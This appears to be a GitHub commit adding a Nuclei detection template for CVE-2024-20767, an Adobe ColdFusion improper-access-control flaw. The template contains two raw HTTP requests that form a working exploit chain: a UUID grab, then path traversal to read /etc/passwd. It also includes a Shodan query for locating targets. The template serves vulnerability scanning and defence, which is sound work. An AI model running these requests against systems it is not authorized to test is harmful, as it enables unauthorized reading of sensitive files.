Merge pull request #9419 from projectdiscovery/CVE-2024-20767

Create CVE-2024-20767.yaml
patch-1
Dhiyaneshwaran 2024-03-26 13:50:31 +05:30 committed by GitHub
commit 338eb759e2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 53 additions and 0 deletions

View File

@ -0,0 +1,53 @@
id: CVE-2024-20767
info:
name: Adobe ColdFusion - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
reference:
- https://jeva.cc/2973.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-20767
- https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-20767
cwe-id: CWE-284
epss-score: 0.00087
epss-percentile: 0.35684
metadata:
verified: true
max-request: 2
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2024,adobe,condfusion,lfr
http:
- raw:
- |
GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: {{Hostname}}
- |
GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
Host: {{Hostname}}
uuid: {{extracted_uuid}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'wddxPacket')"
- "contains(header_2, 'application/json')"
- "contains(body_2, '/bin/bash')"
condition: and
extractors:
- type: regex
part: body_1
name: extracted_uuid
group: 1
regex:
- "<var name='uuid'><string>(.*)</string>"
internal: true